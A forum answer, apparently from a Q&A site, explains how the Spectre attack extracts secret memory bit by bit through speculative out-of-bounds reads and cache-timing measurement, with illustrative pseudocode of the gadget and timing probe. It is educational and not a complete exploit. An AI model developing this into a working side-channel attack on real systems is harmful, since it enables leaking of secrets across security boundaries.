I understand the part of the paper where they trick the CPU to speculatively load the part of the victim memory into the CPU cache. Part I do not understand is how they retrieve
They don't retrieve it directly (out of bounds read bytes are not "retired" by the CPU and cannot be seen by the attacker in the attack).
A vector of attack is to do the "retrieval" a bit at a time. After the CPU cache has been prepared (flushing the cache where it has to be), and has been "taught" that a if branch goes through while the condition relies on non-cached data, the CPU speculatively executes the couple of lines from the if scope, including an out-of-bounds access (giving a byte B), and then immediately access some authorized non-cached array at an index that depends on one bit of the secret B (B will never directly be seen by the attacker). Finally, attacker retrieves the same authorized data array from, say, an index calculated with B bit, say zero: if the retrieval of that ok byte is fast, data was still in the cache, meaning B bit is zero. If the retrieval is (relatively) slow, the CPU had to load in its cache that ok data, meaning it didn't earlier, meaning B bit was one.
For instance, Cond
, all ValidArray
not cached, LargeEnough
is big enough to ensure the CPU will not load both ValidArray[ valid-index + 0 ]
and ValidArray[ valid-index + LargeEnough ]
in its cache in one shot
if ( Cond ) {
// the next 2 lines are only speculatively executed
V = SomeArray[ out-of-bounds-attacked-index ]
Dummy = ValidArray [ valid-index + ( V & bit ) * LargeEnough ]
}
// the next code is always retired (executed, not only speculatively)
t1 = get_cpu_precise_time()
Dummy2 = ValidArray [ valid-index ]
diff = get_cpu_precise_time() - t1
if (diff > SOME_CALCULATED_VALUE) {
// bit was its value (1, or 2, or 4, or ... 128)
}
else {
// bit was 0
}
where bit
is tried successively being first 0x01
, then 0x02
... to 0x80
. By measuring the "time" (number of CPU cycles) the "next" code takes for each bit, the value of V is revealed:
ValidArray[ valid-index + 0 ]
is in the cache, V & bit
is 0
V & bit
is bit
This takes time, each bit requires to prepare the CPU L1 cache, tries several time the same bit to minimize timing errors etc...
Then the correct attack "offset" has to be determined to read an interesting area.
Clever attack, but not so easy to implement.